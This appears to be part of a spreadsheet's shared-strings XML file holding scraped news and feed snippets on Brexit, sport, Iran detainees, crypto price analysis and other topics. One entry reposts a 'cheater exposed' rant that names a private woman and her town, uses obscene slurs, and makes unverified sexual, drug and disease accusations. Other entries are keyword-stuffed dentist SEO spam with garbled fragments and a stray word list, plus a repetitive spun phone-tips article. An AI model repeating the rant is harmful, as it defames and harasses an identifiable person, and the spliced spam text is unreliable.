    <t>The pop star turned activist was speaking at a pro-Hong Kong panel event in Melbourne when Ms Lam announced the major backdown in the face of weeks of protest in Hong Kong.</t>
  </si>
  <si>
    <t>No work orders to report.</t>
  </si>
  <si>
    <t>“There was this one girl who was all into not wearing clothes, not cooking food, and would type constantly on the forum from her bed naked with a bowl of raw meat and I’m, like…I don’t know if these are my people.” –Kelly Hogan via</t>
  </si>
  <si>
    <t>Android Authority The post Say hello to what could be Huawei’s next smartwatch appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Australian Mark Firkin and British-Australian Jolie King have been detained for about 10 weeks. The post Australian and British bloggers held in Iran named appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>►Watch the UCI MTB World Cup LIVE on Red Bull TV – https://www.redbull.com/uci An old skool track with new-age riders, Les Gets bought the goods at round 5 of the UCI World Cup this weekend! A bone dry track was quickly carved up by racers gunning for the fastest time and coveted top step of […] The post Winning on Home Soil | Les Gets DH Highlights with Eliot Jackson appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>BBC News - Science &amp; Environment</t>
  </si>
  <si>
    <t>Researchers from around the world meet to finalise a study on the impact of warming on oceans and icy regions. The post Climate change: Scientists to report on ocean ’emergency’ caused by warming appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Misty Dawn Carlisle Green Forest Arkansas Homewrecker Hoe For both Dick &amp; Pussy it dont matter as long as it CUMS her way She’ll get on it…I went to jail Aug.14th to Aug.16th 2019 and this Nasty Fat Bitch couldn’t wait to Bump her Gums, Run her Cock Sucker to my Husband just so she could fuck him… Not to mention she has a kid with my Brother In-law who she tells “Love You to Husband” but fucks his brother wich is her sons Uncle like wat she expect her son to call my husband Uncle Daddy hell na.. this bitch has been with some nasty mofos Male and Female I wouldn’t be surprised if the Cunt has Hurps,Trick,Clap,Gonorrhea, and then some.. Shell send her own Cousin nude pics for 500 bucks and drop to her knees and slobber on a gobber like a rat eating cheese for some dope so look out All Females or Males she could be after your significant other next… NASTY FAKE ASS CUNT…. The post Misty Dawn Carlisle Green Forest Arkansas Homewrecker Hoe For both Dick appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>bonky</t>
  </si>
  <si>
    <t>Saw these puppies at the local reject shop today…. unsure of the quality of them…. but not too bad of a price for USB 3.1</t>
  </si>
  <si>
    <t>Thomas Cook might have survived if not for mismanagement by its executives.</t>
  </si>
  <si>
    <t>If you phone gets wet, it isn’t necessarily beyond repair. Remove your phone’s battery and put your cell phone into a bowl full of rice. The rice will leech out the moisture that has gotten inside the phone. TIP! Your cell phone won’t be toast when dropped into water. Just take the battery out and put it into a bowl full of rice. Are you just learning about cell phones? Do you have one that you’d like to upgrade? If that’s the case, the search can be daunting. This article has offered many tips to teach you about cell phones. Don’t watch video too much if you have an LTE or 4G signal. Your cell phone’s plan may have an allowance for the data you’re using. Videos use up a lot of data, so you may have unexpected charges. If you see yourself going over, you might want to look for a new plan. Restart your phone every now and then to clear its memory. This will make your phone perform faster. If you must call for information on a cellphone, you don’t need to pay huge charges for it. Try the free service at 1-800-411-FREE. After listening to an advertisement, you will get all the information you requested. TIP! You do not have to pay charges for calling information. Instead, call 1-800-411-FREE. Be careful watching YouTube with an LTE or 4G signal. You probably have a monthly allowance of data. Video eats up this allowance rapidly, and you could rack up additional charges if you exceed it. If you routinely exceed your limits, start researching different plans. Smartphones get slower as they age. This means that it may become more difficult to perform updates to your phone as time passes. It is these times where you will need to choose. You can be stubborn and refuse updates, or upgrade the phone to newer versions. TIP! Smartphones are not as fast when they get older. So, the longer you own your phone, the more trouble you are likely to have doing updates or even new apps. Don’t always get the newest phone. Many times, it’s not necessary. Cell phone companies change what phones they carry all the time, but sometimes the phone updates are very minor. Wait a couple of weeks and check out what other people think about their purchase before you make a choice to purchase one. Often it’s not necessary. Prior to actually purchasing your new cell phone, go to some stores and comparison shop. Spend some time testing the features of a variety of models. By doing this, you will probably find the best phone for you, much easier. You do not have to pay charges for calling information. You can just dial 1-800-411-FREE. You can get great information on preventing this from happening. Be absolutely sure you actually need a smartphone before you buy it. Smartphones are quite expensive, but they do offer quite a bit for the money. The reality is that some people only need a phone to make basic calls. If that describes you, buying a smartphone means a higher initial investment, as well as a higher priced monthly fee. You should save your money instead. TIP! Make sure that you need a smartphone before going out there and making a purchase. While these phones require a hefty investment, a variety of features offsets the cost. A smartphone will tend to slow down the longer it is used. Updating software can help to keep the phone from being obsolete. These updates tend to get bigger and more powerful. In a short amount of time, the upgrades might be too new for an old phone. Don’t let your phone get wet. Many people have ruined their phone by dropping it in water. So, to protect your phone, never place it near water. Though you may feel confident in hanging on to your phone, accidents can still occur. TIP! Never place your phone near water. It is very common for people to damage their phones by getting them wet. Does your phone battery drain rapidly? If so, your phone might be getting a weak signal. Weak signals can drain batteries. When not using your cell phone, don’t store it in a signal-less location like closets or drawers. Speak with friends and others about what to look for in a cellphone. People you already trust can give you a lot of feedback regarding the phones they have used. They are likely to have a wealth of information to share as you shop for just the right phone. TIP! Ask loved ones for reviews of their cell phones. People you trust are likely to have great advice for you. As you have just read, smart phones are not simple devices. The advice in this article is basic and will help you know where to start. Look it over a couple times and get new information as it comes available. Then go out and purchase the best cell phone for you. You don’t need a smartphone if you’re only going to use your phone for talking. Everyone has one, but most people are paying for features they may not need. Smartphones cost a lot more than regular phones do, so you can save some money to get a regular phone if you’re just going to use it to talk to people. Many people are interested in make your own phone covers , but are unsure of how to learn more. This article has so much information, you’ll be ready to move forward with confidence. It is up to you to apply the ideas you have reviewed.</t>
  </si>
  <si>
    <t>Chloe Moretz's Twitter account was apparently hacked with now-deleted tweets that referenced Jack Dorsey's supposed Social Security number.</t>
  </si>
  <si>
    <t>Chamber of Commerce and Industry Queensland head of media Dan Petrie says Premier Annastacia Palaszczuk “needs to articulate” a strategy for small business in the face of a “difficult” state economy. The state’s parliament is holding its regional sitting in Townsville this week, a region which Mr Petrie said is constantly having trouble overcoming a lack of resource projects in the area. Image: News Corp Australia</t>
  </si>
  <si>
    <t>dhcomet posted a photo: A Royal Coat of Arms from the late 1600s displayed at</t>
  </si>
  <si>
    <t>Bauer Hockey and GuardLab Announce A New Mouthguard Collaboration – The APEX guards are designed to closely replicate the look, feel and fit of GuardLab’s custom-fitted mouthguards, including. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CL. Convenience and time-saving are key benefits to patients as they move through to a state of "live-your-best-life" wellness. disciplinary clinics, now at 74 within Walmart locations, across six. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Elizabeth May seeks to blow past political pack with platform rollout – She has spent much of the campaign so far close to home in British Columbia but she embarks on a tour of Ontario Monday, Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental. Friendliest Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his. Top Dental Clinic In Kitchener Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CL. Best Dental Clinic Near Kitchener DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non-Surgical Extractions, Wisdom Tooth Extraction. . The Laurentian Walk-In Clinic is a walk in clinic in. Home Physicians Diagnostic Imaging Family Physicians Medical Clinics Medical Laboratories Pharmacies Walk-in Clinics Dental Dental Hygienists Dentists Orthodontists. . TORONTO — New Democrats and Greens agree on a lot, Jagmeet Singh said near the midpoint of Thursday night’s federal. But. Below are some of the best. for dental clinics, then, Google My Business (GMB) is a great way to bring in massive traffic to your clinic website. Let us go through how GMB promotion works: • When a. Highest Rated Dentist In Kitchener Reviews on Dentist Reviews in Kitchener, ON – Solar Dental, Waterloo Smiles Dentistry, Fairway Dental Urgent Care Clinic, Lackner Woods Family Dentistry, King Street Dental Centre, Arvanitis &amp; Associates Dentistry by Design, de Man &amp;. Highest Rated Most Reviewed Distance Bird's-eye View Driving (8 km.) Biking (4 km.) Walking (2 km.) Within 4 blocks Price $ $$ $$$ $$$$ Features. Dentists in Kitchener ON (413 Result(s)) Relevance Closest Highest rated Most reviewed Alphabetical Recently Reviewed Filters Locations Pick the area(s) you’d like to see results in. Ayr, ON Baden, ON. Top Dental Clinic Near Kitchener Top Dental Clinic Near Kitchener Ontario Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, Welcome to Anabella Dental in Kitchener! We are a general dental clinic with special interest in complex cosmetic, surgical and implant. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CL. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental. Most Popular Dentist Near Kitchener Ontario Friendliest Dentist In Kitchener Ontario Greens to reveal platform and other leaders play offence as campaign enters Day 6 – Meanwhile, Liberal Leader Justin Trudeau is blitzing southwestern Ontario with stops in Kitchener and London before a rally . Fur-baby frenzy in Kitchener, Waterloo – In 2018, Kitchener ranked fourth on Amazon’s top-20 list of Canadian cities that pamper their pets the most. Kitchener ranked. Simply Delicious – Restaurant in Kitchener, ON – 300 King Street East, Kitchener, Ontario. Simply Delicious Reviews April 10, 2018 Carol 5 Star rating! They have the friendliest and most accomodating staff. Their Schnitzel is humungous and. Best Dentist In Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Best Dentist In Kitchener Ontario Friendliest Dentist In Kitchener Ontario Cosmetic Dentist Near Kitchener Ontario Cosmetic Dental. Best Dental Clinic In Kitchener Ontario Dental Specialties in Kitchener &amp; Waterloo, Ontario – We offer dental services such as emergency dentistry, general dentistry, cosmetic dentistry, Cosmetic Dentist Near Kitchener The Best Cosmetic Dentists in Kitchener Handpicked Top 3 Cosmetic Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Kid Friendly Dental Clinic In Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, We focus on family and cosmetic dentistry and use the latest technologies and techniques in the dental. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Skip to main content Waterloo Family Dental. Friendliest Dental Clinic In Kitchener Search 44 Dental Clinic jobs now available in Kitchener, ON on Indeed.com, the world’s largest job site. Dental Clinic Jobs in Kitchener, ON (with Salaries) | Indeed.com Skip to Job Postings , Friendliest Dental Clinic In Kitchener a aa aaa aaaa aaacn aaah aaai aaas aab aabb aac aacc aace aachen aacom aacs aacsb aad aadvantage aae aaf aafp aag aah aai aaj aal aalborg aalib aaliyah aall aalto aam. Here’s Why Shiny White Dental Center. Friendliest Dental Clinic In Kitchener – Best Dentist in Kitchener [. ] Looking for a Cosmetic Dentist? Tips for Choosing the Right Clinic – Start with an Online Search – This might lead you to Robina Town Dental. [. ] Reply July 22, 2019 10:43 PM. Cosmetic Dentist Near Kitchener Dr. Jim Ellis DDS Dentist – Ogden Is The Cosmetic Dentistry In Ogden – The dentists at Dr. Jim Ellis DDS Dentist – Ogden offer each patient the personalized care and attention needed to ensure. Kid Friendly Dental Clinic In Kitchener Ontario Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Smile Town, Danube Dental Clinic, Trillium Dental Centre, Midgley Dental, Laurelwood Family Dentistry, Toothworks Fairview Park Dental, Kitchener East Family Dental, Harmony. . Top Dentist Near Kitchener Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental. Most Popular Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Welcome to Anabella Dental in Kitchener!. Thoughts of going to a dental clinic usually evoke frightening dentistry images involving weird dental instruments that make drilling. Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards!. Campus life in Ottawa is about to change. Just how much, no one knows – It’s a question that will unfold for dozens of campus programs and services across Ontario as the province. than those. Top Dentist Near Kitchener Ontario A week after the Ontario Fire Marshal’s Office issued a. McLauchlin’s fiancé and her parents are calling for a ban on. Sudbury briefs: Protest goes on the road; motorcycle run; traffic report – Sudbury home-care workers, locked out of their jobs since May, were in Kitchener on Thursday to protest. Sudbury letters: Investigation needed; defending Peter Best; cellphone ban right call Egan. Top 3 reasons I hate going to the dentist: 3. Dentist never takes time to explain advancements in the industry and how it can help me 2. Staff are too busy to be friendly 1.They. read more Page 1 of 23 1 2 3 4 5 6 7 8 9 Next More Dentists in Ki. almost four percentage points below the Ontario graduation rate at that time. Public schools have made the biggest leap after. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists Parada Dentures Dentist. . Singh, May fight for support on debate stage – TORONTO — New Democrats and Greens agree on a lot, Jagmeet Singh said near the midpoint of Thursday night’s federal. But. The Ontario Fire Marshal has issued a warning about small table top fireplaces that use ethanol. In the summer of 2016, Dr. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increas. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitchener) near Grand River. Since approving the LRT in 2011, $3.2-billion worth of building permits have been issued by the region, of which two-thirds. Best Dentist Near Kitchener Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitch. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Environment, economic development and transportation top priorities in Kitchener – and a plan to create two pedestrian-first streets near City Hall and the Kitchener Market; •environmental leadership with. She said public health’s Niagara Falls division has been unable to provide many services out of the Kitchener Street building. Best Dentist In Kitchener Ontario Elizabeth May seeks to blow past political pack with platform rollout – She has spent much of the campaign so far close to home in British Columbia but she embarks on a tour of Ontario Monday, Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most. List of Dentists in Kitchener, Ontario. Belmont Dental Care +1 226-647-9222 564 Belmont Avenue West Unit 108B, Kitchener, Ontario N2M 5N6 Dentist 36 views See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Bauer Hockey and GuardLab Announce A New Mouthguard Collaboration – Bauer looked at several alternatives, concluding that GuardLab produces the best, most comfortable. Founded in Kitchener, The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. Highest Rated Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Emergency, Family, and Cosmetic Dental Care, Sleep Dentisrty, Welcome to Anabella Dental in Kitchener! We are a general dental clinic with special interest in complex cosmetic. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. . Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Top Dental Clinic In Kitchener Ontario Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. The dental implant crown costs just about $1350, the best deal among Sydney dental implant clinics. ‘The price difference. Reviews on Walk in Clinic in Kitchener, ON – Waterloo Walk-In Clinic, Fairway Dental Urgent Care Clinic, Cambridge Walk in Clinic, Cure Hearing Centre, Romin Optical Yelp Find Near Cancel Log In Sign Up</t>
  </si>
  <si>
    <t>That includes any party that promotes fossil fuel projects such as the expansion of the Trans Mountain oil pipeline, party leader Elizabeth May told a news conference in Montreal Thursday.</t>
  </si>
  <si>
    <t>It wasn’t until 1978 that Diet Eman realised she had an obligation to reveal her story of heroism during World War II.</t>
  </si>
  <si>
    <t>The wife of a retired engineer from London jailed in Iran appeals to the UK government for help. The post Iranian spying charge ‘preposterous’, prisoner’s wife says appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Insurance rates on renewal are up nearly 4% in the Lloyd’s market, which has returned to profitability. “While market conditions generally remain at historically competitive levels, price increases have been witnessed across all major lines, most notably in property and… The post This is how hard the Lloyd’s market has become appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>STRICTLY COME DANCING It Takes Two presenter Zoe Ball was left stunned after professional dancer Oti Mabuse seemed to make a dig at her new dance partner in this year’s first episode of It Take’s Two. Here’s what she said. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Harry Kane was on target as 10-men Tottenham held on to secure a vital 2-1 victory over Southampton at the Tottenham Hotspur Stadium this afternoon.</t>
  </si>
  <si>
    <t>Jeffrey Epstein’s ‘sex slave’ today claimed she had sex with Prince Andrew in a bathroom when aged 17 after the royal plied her with vodka at a posh nightclub, according to The Sun.</t>
  </si>
  <si>
    <t>Goya Dmytryshchak</t>
  </si>
  <si>
    <t>A brother of one of the missing campers found dead in their car at Thomson Dam has taken to social media to thank those involved in the search.</t>
  </si>
  <si>
    <t>SKY has revealed a next-generation design for its remote control which has a renewed emphasis on voice control. Unfortunately, the new remote doesn’t appear in any part of the Sky Store so it seems like this new design – which is front-and-centre – on the Sky Q website is available to buy for now. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Skonto Rigga</t>
  </si>
  <si>
    <t>The international break has given Fantasy Premier League managers plenty of time to stew over their squads. As ...</t>
  </si>
  <si>
    <t>Nuggets</t>
  </si>
  <si>
    <t>Price beat at Officeworks with C&amp;C for a total cost of $597.55. If you are travelling soon, make use of the Tourist Refund Scheme to obtain a refund of the tax paid, for a total outlay of $543.23.</t>
  </si>
  <si>
    <t>OPINION Michael Owen and Newcastle United in the same sentence doesn’t usually make for positive reading in the North East. After claiming in his new book that he didn’t want to play for the Magpies after signing from Real Madrid as he saw them as a step-down, he isn’t exactly a popular figure in Tyneside anymore. The spat between Owen and club-legend Alan Shearer in recent weeks... Source</t>
  </si>
  <si>
    <t>The footy field has been Joel Tippett's release during this hectic year, not that he doesn't enjoy his other roles.</t>
  </si>
  <si>
    <t>Bakkt’s long-awaited Bitcoin futures contracts launch did not elicit the market reaction most traders were hoping for. Instead, Bitcoin continues consolidating without a clear sign of where it’s heading next while altcoins are giving mixed signals. The following technical analysis will focus on the different scenarios that could play out for Ethereum, XRP, and Litecoin. Ethereum Since the beginning of the month, Ethereum surged nearly 37 percent to reach a high of $225 on Sept. 19. Following the recent peak, Ether retraced 9 percent. Now, a number of indicators are signaling a further decline. A spinning top candlestick pattern developed on ETH’s 3-day chart. This technical formation represents indecision about the future direction of this cryptocurrency since neither the bulls nor the bears were able to gain control of the price action. Nonetheless, the current candlestick appears to be moving below the 150-three-day moving average. This, in combination with the spinning top candlestick pattern, increases the probability of a correction. If Ethereum indeed closes below the 150-three-day moving average, which is acting as a strong point of resistance, its market valuation could experience a sharp decline down to the 100-three-day moving average: $181. Conversely, a spike in volume that allows ETH to close above the 150-three-day moving average could signal the start of an uptrend that takes this cryptocurrency up to the 200-three-day moving average: $317. ETH/USD by TradingView Adding to the bearishness, the TD sequential indicator recently presented a sell signal in the form of a green nine. This technical index predicts a one to four day correction or the beginning of a new countdown. By measuring the Fibonacci retracement indicator from the high of $363 on June 26 to the low of $164 on Aug. 29 on the 1-day chart, one can identify a series of support and resistance levels that may play a role in ETH’s trend. Ethereum is currently testing the support zone given by the 23.6 percent Fibonacci retracement level that sits around $211. Breaking below this area may allow ETH to continue depreciating and test the next level of support, around $196 at the 16.18 percent Fib. If the 16.18 percent Fibonacci retracement area is not able to contain the price of Ethereum, the chances for a further decline down to the setup trendline at $181 increases. This will coincide with the bearish scenario presented on the 3-day chart. XRP XRP recently went through a major upswing that pushed its price up nearly 30 percent. More than $2 billion were injected into its market capitalization within six days. Although the reasons for the sudden surge are unknown, its presumed that it may be the first market response to a series of partnerships announced by Ripple. Ripple recently revealed the addition of Xendpay, a U.K.-based remittance firm, to its pool of clients for its global settlements platform, RippleNet. The partnership will allow Xendpay to target new markets like the Philippines, Vietnam, and Indonesia and support currencies that were inaccessible in the past. In addition, the distributed ledger startup became MoneyGram’s key partner for cross-border payment and foreign exchange settlement in June. The two-year contract will enable MoneyGram to send money from one currency and get it instantly settled in the destination’s currency with the help of xRapid. Despite the bullish momentum that XRP had, it has now lost 18 percent of its value in the last few days. This could be attributed to the fact that Ripple is reportedly increasing its sales of XRP, pushing other investors to take profits at price jumps. The sell-offs XRP is experiencing are so significant that more than 3,600 disgruntled investors signed a petition entitled “Stop Ripple Dumping.” As a result, the current sentiment around XRP is uncertain. One of the most practical ways to interpret its price movement is by drawing a series of support and resistance levels on its 3-day chart. These price hurdles are essential to determine which direction XRP’s market valuation will move. At the moment, it seems like XRP was able to move above the $0.30 resistance level to test the next level of resistance at $0.33. But, since it failed to break above it, XRP pulled back to the $0.24-$0.30 zone. This trading range represents a pivotal point on XRP’s trend. If XRP is able to trade and remain above $0.30, then it will enjoy a bullish impulse that will take it to test the next resistance levels at $0.33, $0.38 and $0.42. Conversely, if this cryptocurrency moves below $0.24 it will likely make a lower low by reaching $0.20. Due to the sentiment around this cryptocurrency, it will be wiser to remain on the sidelines until a clear break out the $0.24-$0.30 trading range. XRP/USD by TradingView Litecoin Litecoin is trading inside an ascending parallel channel on its 1-day chart. This technical pattern began developing in late August when LTC was trading at $62.30 and has since contained its price action. Each time Litecoin reaches the top of the channel it retraces to the middle or the bottom of the channel and then bounces off to the top once again. Now, a similar scenario could be underway. Since LTC is currently trading around the bottom of the channel it could go up to the middle or the top, around $78 and $82, respectively. Additionally, a reversal doji is forming under the same timeframe suggesting an end of the recent 11.50 percent multi-day correction and the beginning of a new uptrend. LTC/USD by TradingView The moving averages on the 12-hour chart can be used as support and resistance zones to determine if LTC will be able to bounce off current price levels. Therefore, a close above the 100-twelve-hour moving average could trigger a bullish impulse to the 150-twelve-day moving average, which is exactly what the ascending parallel channel on the 1-day chart is forecasting. Nonetheless, if the selling pressure behind this cryptocurrency increases and Litecoin moves below the 50-twelve-day moving average it could try to test the next level of support around $64. Overall Sentiment Despite the different signs that a new “altseason” is underway, the cryptocurrencies previously analyzed are all indicating opposing views. In fact, Ethereum is in a bearish posture aiming for a test of the $196 support level while XRP is in a no-trade zone. Litecoin, however, could be about to rebound to $82. Since the entire market seems to move in the same direction most of the time, the different perspectives that these cryptocurrencies present are a clear indication of indecision. Thus, it will be wiser to wait for a clear break of the support or resistance levels previously explained before entering a trade. Like what you see? Get more altcoin outlook news in your inbox… Subscribe to CryptoSlate Recap, our daily newsletter containing the top stories and analysis. Sign up to stay informed Filed Under: Ethereum, Litecoin, Price Analysis, Ripple, Technical Analysis, Trading Related News Stories Coins Mentioned After Ali began forex trading in 2012 In 2014, he came across Bitcoin’s whitepaper and was so fascinated by the idea of a decentralized, borderless, and censorship-resistant currency that he started buying Bitcoin. By 2015, he started traveling to spread the word about Bitcoin. View author profile Commitment to Transparency: The author of this article is invested and/or has an interest in one or more assets discussed in this post. CryptoSlate does not endorse any project or asset that may be mentioned or linked to in this article. Please take that into consideration when evaluating the content within this article. Disclaimer: Our writers’ opinions are solely their own and do not reflect the opinion of CryptoSlate. None of the information you read on CryptoSlate should be taken as investment advice, nor does CryptoSlate endorse any project that may be mentioned or linked to in this article. Buying and trading cryptocurrencies should be considered a high-risk activity. Please do your own due diligence before taking any action related to content within this article. Finally, CryptoSlate takes no responsibility should you lose money trading cryptocurrencies.</t>
  </si>
  <si>
    <t>The National Highway Traffic Safety Administration has opened a preliminary investigation into 553,000 Nissan Rogue sport utility vehicles after reports of their automatic emergency braking systems engaging without warning or an obstruction, the agency said on Thursday.</t>
  </si>
  <si>
    <t>Priest takes the gospel to the streets of rural Ontario A motorcycle club member is baptized in the waters of Lake Huron by the Rev. Stephen Martin. Photo: Contributed A diocese of Huron priest is reaching out to the unchurched by giving services from the back of his SUV in the parking lots of southern … Continue reading "‘Soul Man, will you pray for us today?’" The post ‘Soul Man, will you pray for us today?’ appeared first on Anglican Church of Canada - CEP online.</t>
  </si>
  <si>
    <t>Saliba in away end against Watford, Bellerin back in training, Gunners set to pip Utd to wonderkid Pye – The Sun Original Source ARSENAL were stunned as they let a two-goal lead slip away at Watford on Sunday afternoon. Things were going to plan after Pierre-Emerick Aubameyang netted a brace before the break, but the Hornets stormed back in the second period to snatch a deserved point. Follow all the latest news and gossip from the Emirates right here…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Saliba in away end against Watford, Bellerin back in training, Gunners set to pip Utd to wonderkid Pye – The Sun appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Board-game sales were estimated at around $1.5 billion in 2018, more than double their 2013 levels and projected to surge to $12 billion by 2023.</t>
  </si>
  <si>
    <t>Mining projects will require 21,000 new workers including engineers, geologists and tradies the over the next five years to meet growing demand, according to a report from the Australian Mines and Metals Association. More than half of those workers will be required in Western Australia where 30 of the mining proposals will be based but there are concerns skill shortages could make filling the roles a challenge. Chamber of Minerals and Energy WA Rob Carruthers said “in some ways, skills shortages are good problems to have and it reflects the growth that we’re seeing back in the sector that wasn’t there for the last five or six years”. He branded the uptick in positions a “mini-boom” for the industry. The report did not include more than 150 other potential mining projects which would see the need for new employees shoot even higher. Image: Getty</t>
  </si>
  <si>
    <t>Brisbane skipper Darius Boyd has issued a dire warning to ruthless social media critics, warning it will take an NRL player taking his own life for them to lay off.</t>
  </si>
  <si>
    <t>Lydia Lynch</t>
  </si>
  <si>
    <t>Two years after he died from being pinned under a 98-kilogram benchpress, the gym Ben Shaw worked out in is going to court.</t>
  </si>
  <si>
    <t>AVENGERS ENDGAME is long over but now it has been revealed the film franchise suffered from a scheduling problem that caused a big prop change on the box office smash set during filming. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>The law to stop the UK exiting the EU with no deal on 31 October gained royal assent on Monday. It means that the government must formally request a delay until 31 January 2020 unless a deal, or a no-deal exit, is approved by MPs on 19 October. However, the prime minister has stated he would “rather be dead in a ditch” than ask for a delay to coming out of Europe on 31 October. In Dublin today Boris Johnson said he was confident the government would find a deal by then. ‘Dead in a ditch’ It’s ultimately up to the EU whether it grants an extension (Photo: illustration by Christopher Furlong/Getty Images) At a press conference with the Taoiseach, Leo Varadkar, Mr Johnson said: “I want to find a deal. I have looked carefully at no-deal. “Yes, we could do it, the UK could certainly get through it, but be in no doubt that outcome would be a failure of statecraft for which we would all be responsible. “I would overwhelmingly prefer to find an agreement. I do believe that a deal can be done by October 18 so let’s do it together.” Test the law Read more: Irish PM Leo Varadkar tells Boris Johnson he won’t get trade deals after a no-deal Brexit Foreign Secretary, Dominic Raab, said that while the government would adhere to the law it would also test it “to the limit”. “We will want to test to the limit what it does actually lawfully require, “ he has said previously. “We will look very carefully at the implications and our interpretation of it … At what it requires and what it doesn’t require.” The Chancellor, Sajid Javid, has echoed Mr Raab’s comments. “The bill talks about the 19th [of October] being an important date and at that point we will consider our options but our policy is clear, it is unchanged, we will be leaving on Oct. 31,” he said. “We will obey all laws because all governments should obey laws absolutely, but you will have to wait and see what happens then.” More Brexit Athena: Why Leo Varadkhar mocked Boris Johnson over Brexit Greek myth Johnson is 'hijacking' Brexit referendum to push no-deal, Corbyn says Boris Johnson hints at compromise over Irish backstop France to insist on a '2 year' extension to allow Brexit re-evaluation Varadkar tells Johnson he won't get trade deals after a no-deal Brexit John Bercow's most controversial moments as Commons Speaker The post Law to stop no-deal Brexit on 31 October given royal assent by the Queen appeared first on inews.co.uk. The post Law to stop no-deal Brexit on 31 October given royal assent by the Queen appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Michael Taube</t>
  </si>
  <si>
